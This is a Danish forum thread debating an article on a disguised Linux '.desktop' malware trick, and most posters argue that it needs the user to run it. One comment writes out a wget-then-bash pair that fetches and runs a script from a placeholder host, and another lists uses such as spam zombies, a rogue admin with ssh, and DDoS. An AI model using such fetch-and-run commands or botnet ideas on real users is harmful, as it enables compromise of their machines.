Sådan laver man en virus til Linux

At skrive et python program der kan holde sig forholdsvist skjult og køre i baggrunden kan næppe betegnes som en virus..



Den kan for det første ikke sprede sig.

Dernæst kræver den at brugeren manuelt henter og kører den..



Det er vel ikke anderledes end en .bat fil til windows med del c:\windows\ensystemfil ?

Jeg vil også kalde det en smule søgt at klasificere det som en virus i den gængse forstand.

Det er vist ved at være en del år siden at windows folket slap for manuelt at installere deres egen virus (det er squ da brugervenligt)

Og hvis jeg endelig ville til at distribuere mine egne vira, til manuel install så vil jeg da foretrække at den har den samme filendelse som whatever det er jeg prøver at forklæde den som. Eller slet og ret begynde at distribuere diverse programmer som kan multitaske (overtage maskinen, og udføre det man regner med at den vil )



Moralen må være at der er nogen der har fat i den lange ende, når man siger at man ikke skal installere programmer unden om sin pakkemanager, eller fra skumle 3 party repositorys.

#1

Det, artiklens eksempel kan bruges til, kunne f.eks være en spam-zombie til at sende random mails ud med reklamer, eller endda kopier af den ondsindede kode - hvilket dernæst vil kvalificere den som værende en rigtig virus. Hvis man succeeder i hans root-angreb-eksempel, kan man oprette en bruger med adminrettigheder, og starte ssh - hvorefter computeren kan bruges til at udføre angreb på mere sikrede steder. Laver man en masse af disse zombier, så kan man lave et DDoS.



Der er ligeså mange muligheder som der er folk der kan udtænke dem :)

Du kan utvivlsomt lave en masse ravage på et system hved hjælp af den lille guide, men det kræver stadig en aktiv bruger indsats at blive inficeret.



Jeg vil ikke mene det er anderledes end hvis jeg starter alle mine hjælpe indlæg med følgende



wget http://innocentsite.org/download

bash ./fix_your_problem.sh



ja, det har intet med virus at gøre.. og INTET system vil jo være fri for sådanne angreb..uanset hvor mange access kontrol systemer du laver, så vil brugeren jo skulle have mulighed for at override - og om den override foregår via chmod +x gah.sh eller do_fucking_advanced_MAC_allow gah.sh ; ./gah.sh er sgu ligemeget, sagen er den, at hvis brugeren aktivt giver lov til at køre ondartede ting, er der INTET et system kan gøre for at forhindre det..



det der kan ikke betegnes som andet end standard malware...



edit:

LOL nu har jeg lige læst hele artiklen - totalt til grin..

Forfatteren af af artiklen er kommet med et follow up:

http://www.geekzone.co.nz/foobar/6236



De hygger sig vist derude på NZ, men helt til grin er det ikke. Vi kan bare vente os !

#6:

vi kan ikke "vente os", nej.



Det her er en totalt til grin post - der er sgu da ingen som er dumme nok til at gemme en .desktop og tro det er et billede, og så bare klikke på det, og hvis de er, well - så er der _INTET_ der overhovedet kan hjælpe dem, såfremt de ønsker at bruge en computer som de gør nu. Dette usecase can fikses, men det har den store pris, at en bruger vil skulle igennem store administrative processer, for at ændre rettigheder ved et mindste nyt ønske om software.



Dette er ikke en virus, det er det samme som at sige "please2run det her program!!!!"



og bare fordi det kan sprede sig gennem email, ændrer stadig ikke på, at modtagerene af emailsne er 100% sikre, såfremt de ikke vælger at gemme et script/stykke kode, og aktivt vælge at køre det. Dette er ikke et usikkert stykke softwares skyld, men en person der ikke har nok forstand på en computer, og softwaret, til at bruge det - I den "virkelige" verden har vi mekanismer der gør at sådanne ting ikke så let sker - for eksempel, du skal have kørekort for at køre bil, jagt tegn for at må gå med riffel/gevær og jagte, man bliver som barn lært basale ting, såsom sæt dig ikke på kogeblusset - gå ikke ind foran biler, løb ud af huset hvis det brænder - osv. Såfremt en person sidder i et hus, og der opstår brænd, og han ikke går ud - well.. det er samme problemstilling som det her.



opsummering: for folk der er kvalifiseret til at bruge en computer, er der intet at bekymre sig om - og til resten, well, som jeg har sagt, det de har brug for, er at blive oplært, ikke få software der arbejder uden om det. Der er ingen anden udvej, giv folk noget basal viden omkring computere, og det her problem forsvinder totalt.